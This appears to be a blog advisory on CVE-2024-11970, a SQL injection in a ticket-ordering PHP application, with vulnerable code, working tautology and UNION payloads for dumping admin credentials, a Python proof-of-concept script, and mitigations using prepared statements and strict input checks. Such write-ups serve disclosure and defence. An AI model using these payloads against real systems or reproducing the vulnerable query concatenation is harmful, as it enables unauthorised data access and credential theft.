In late 2024, a security vulnerability was disclosed in the Concert Ticket Ordering System 1. developed by code-projects, tracked as CVE-2024-11970. It is a SQL Injection vulnerability in the /tour(cor).php file, reachable through the mai parameter. Below, we break down what this means, show how an attacker can exploit it, and cover how to fix or mitigate the issue.
## What is CVE-2024-11970?
CVE-2024-11970 is a vulnerability rated critical in the code-projects "Concert Ticket Ordering System". The application fails to validate or escape the mai parameter in /tour(cor).php before concatenating it into a SQL query, so an attacker controls part of the query text and can inject arbitrary SQL: a textbook SQL Injection. The issue is remotely exploitable, and a proof-of-concept exploit is already public.
- Vulnerability type: SQL Injection
- Impact: remote attackers can read, modify, or delete database data; depending on database privileges and configuration, this can in some cases be escalated to remote code execution.
- Affected file: /tour(cor).php
- Affected parameter: mai
- Discovery: public advisory and exploit published (see the original advisory and the VulDB entry in the References)
## Where is the Problem?
Inside the Concert Ticket Ordering System's file /tour(cor).php, the application reads the mai parameter from the request (GET or POST) and concatenates it straight into a SQL statement, like this (simplified):
```php
<?php
// WARNING: vulnerable code, kept as the page describes it (simplified)
$mai = $_GET['mai'];                                  // attacker-controlled input
$query = "SELECT * FROM tickets WHERE id = '$mai'";   // interpolated into the SQL text
$result = mysqli_query($conn, $query);                // executed verbatim
?>
```
The problem: $mai is placed directly in the query text with no validation and no escaping. The single quotes around it are all that separates data from SQL, so a value containing a quote closes the literal and everything after it is parsed as part of the query.
## Exploitation Example
Suppose the vulnerable site is at http://example.com/tour(cor).php. An attacker exploits the flaw by requesting a URL such as:
```
http://example.com/tour(cor).php?mai=1'%20OR%201=1--%20
```
After URL decoding, the server builds and runs:
```sql
SELECT * FROM tickets WHERE id = '1' OR 1=1-- '
```
- The quote closes the string literal, OR 1=1 makes the WHERE clause true for every row, and -- comments out the dangling quote. The trailing %20 matters: MySQL only treats -- as a comment when it is followed by whitespace.
- This returns all tickets instead of just the one with ID "1".
### More Serious Attacks
An attacker can also pull data from other tables with UNION. For example, assuming an admin table with username and password columns:
```
http://example.com/tour(cor).php?mai=1' UNION SELECT 1,username,password FROM admin-- -
```
The UNION must supply the same number of columns as the original SELECT (three here, as an illustration). Wherever the page renders the query result, the injected row appears in the response alongside the ticket data, handing the attacker the admin username and password hash. Unsuppressed SQL error messages make this easier by revealing the column count and table names, but they are not required for the attack.
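As an added example that is not code from the page or from the code-projects application, the following Python script reproduces the vulnerable concatenation against an in-memory SQLite database and runs both payloads through it. The table and column names (tickets; admin with username and password), the sample rows and the password hash are constructed assumptions chosen to match the payloads above, not the application's real schema. SQLite accepts the same -- line comments as MySQL, so the tautology and the UNION behave as described.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed schema and rows for the demonstration (assumption, not the real app's schema).
SCHEMA = """
CREATE TABLE tickets (id INTEGER PRIMARY KEY, event TEXT, seat TEXT);
INSERT INTO tickets VALUES (1, 'Opening Night', 'A1'),
                           (2, 'Matinee', 'B7'),
                           (3, 'Closing Night', 'C3');
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'admin', '$2y$10$constructed.hash.value');
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def mai_from_url(url):
    """Decode the mai parameter the way PHP's $_GET would (percent-decoding)."""
    return parse_qs(urlsplit(url).query)["mai"][0]


def build_vulnerable_query(mai):
    """Same string concatenation as the vulnerable /tour(cor).php snippet."""
    return f"SELECT * FROM tickets WHERE id = '{mai}'"


def vulnerable_lookup(conn, mai):
    """Run the concatenated query; the database sees whatever mai contains."""
    return conn.execute(build_vulnerable_query(mai)).fetchall()


if __name__ == "__main__":
    conn = make_db()

    # Payload from the first URL: quote closes the literal, OR 1=1 matches every row
    tautology = mai_from_url("http://example.com/tour(cor).php?mai=1'%20OR%201=1--%20")
    print(build_vulnerable_query(tautology))
    print(vulnerable_lookup(conn, tautology))   # all three tickets, not just id 1

    # UNION payload: three columns to match SELECT * on the constructed tickets table
    union = "1' UNION SELECT 1,username,password FROM admin-- -"
    print(vulnerable_lookup(conn, union))       # ticket 1 plus the admin credential row
```

Running it prints the reconstructed query from the first URL, then all three tickets, then ticket 1 followed by the admin row; mai_from_url shows that percent-decoding of %20 is what turns the URL into the working payload.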
---
## Full Exploit PoC (Proof of Concept)
Here is a simple Python script using requests that retrieves every ticket through the vulnerability:
```python
import requests

url = "http://example.com/tour(cor).php"
# Tautology payload; requests percent-encodes the quote and spaces for us
payload = "1' OR 1=1-- -"
params = {"mai": payload}

r = requests.get(url, params=params, timeout=10)
print(r.status_code)
print(r.text)  # The response should contain every ticket, not just id 1
```
Disclaimer: use only on systems you have permission to test!
---
## How to Fix (Mitigation)
1. Use Prepared Statements (Parameterized Queries):
Update the PHP code to use prepared statements. The query text and the user-supplied value travel to the database separately, so the value can never be parsed as SQL:
```php
<?php
$mai = $_GET['mai'];
// The placeholder keeps $mai out of the SQL text; "i" binds it as an integer
$stmt = $conn->prepare("SELECT * FROM tickets WHERE id = ?");
$stmt->bind_param("i", $mai);
$stmt->execute();
$result = $stmt->get_result();
$stmt->close();
?>
```
2. Input Validation:
Explicitly check that mai contains only expected values. Note that intval() coerces rather than rejects (intval("1' OR 1=1") is 1), so on its own it only neutralises the payload; combine it with the prepared statement above, or reject non-numeric input outright with ctype_digit() and return an error:
```php
<?php
$mai = intval($_GET['mai']); // Accepts only a numeric id; non-numeric input becomes 0
?>
```
3. Hide SQL Error Messages:
Turn display_errors off in production and log database errors server-side instead. This does not close the injection, but it denies the attacker the feedback used to discover column counts and table names.
4. Update the Application:
If a patched release of the system is available, upgrade to it; otherwise apply the code changes above and contact the vendor for a security fix.
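As an added example (not the project's code), here is the lookup hardened in Python against SQLite, covering steps 1 and 2 together with a caveat about intval(). The tickets table and its rows are constructed; php_intval_like is a hypothetical helper that mimics PHP's intval() on a string (leading integer, else 0). Run against the same tautology payload, parameterization alone matches nothing, intval-style coercion silently serves ticket 1, and strict digit-only validation rejects the request outright.

```python
import re
import sqlite3

# Constructed table for the demonstration (assumption, not the real application's schema).
SCHEMA = """
CREATE TABLE tickets (id INTEGER PRIMARY KEY, event TEXT, seat TEXT);
INSERT INTO tickets VALUES (1, 'Opening Night', 'A1'), (2, 'Matinee', 'B7');
"""


def make_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def php_intval_like(raw):
    """Hypothetical stand-in for PHP's intval() on a string: take the leading,
    optionally signed integer after any leading whitespace, otherwise return 0."""
    m = re.match(r"\s*([+-]?\d+)", raw)
    return int(m.group(1)) if m else 0


def parse_mai_strict(raw):
    """Reject anything that is not a plain unsigned decimal ticket id."""
    if not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("mai must be a decimal ticket id")
    return int(raw)


def lookup_parameterized(conn, value):
    """Placeholder query: the value is bound as data and is never parsed as SQL."""
    return conn.execute("SELECT * FROM tickets WHERE id = ?", (value,)).fetchall()


def lookup_coerced(conn, raw):
    """Mitigation 2 as written on the page (intval) followed by mitigation 1."""
    return lookup_parameterized(conn, php_intval_like(raw))


def lookup_strict(conn, raw):
    """Strict validation followed by the parameterized query."""
    return lookup_parameterized(conn, parse_mai_strict(raw))


if __name__ == "__main__":
    conn = make_db()
    payload = "1' OR 1=1-- "
    print(lookup_parameterized(conn, payload))   # [] : bound as text, matches no id
    print(lookup_coerced(conn, payload))         # ticket 1 : intval() quietly kept the "1"
    try:
        lookup_strict(conn, payload)
    except ValueError as exc:
        print("rejected:", exc)                  # strict validation refuses the request
    print(lookup_strict(conn, "2"))              # legitimate id still works
```

The difference between lookup_coerced and lookup_strict is the point of the caveat: both are injection-proof once the query is parameterized, but only the strict version tells you (and your logs) that someone sent SQL in a ticket id.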
---
## References
- NVD - CVE-2024-11970
- VulDB - CVE-2024-11970
- Original Code-Projects Concert Ticket Ordering System
---
## Final Thoughts
CVE-2024-11970 shows how one missing boundary between data and query text becomes a critical security problem. SQL Injection remains one of the most dangerous web application vulnerabilities: it can lead to data theft, data loss, or full system compromise.
If you operate any installation of Concert Ticket Ordering System 1., fix this immediately; even small systems are attractive targets. Apply the mitigations above and, as a rule, keep user-supplied input out of query text by using parameterized queries everywhere.
Stay safe, and code securely!
## Timeline
Published on: 11/28/2024 22:15:14 UTC
Last modified on: 12/02/2024 14:48:39 UTC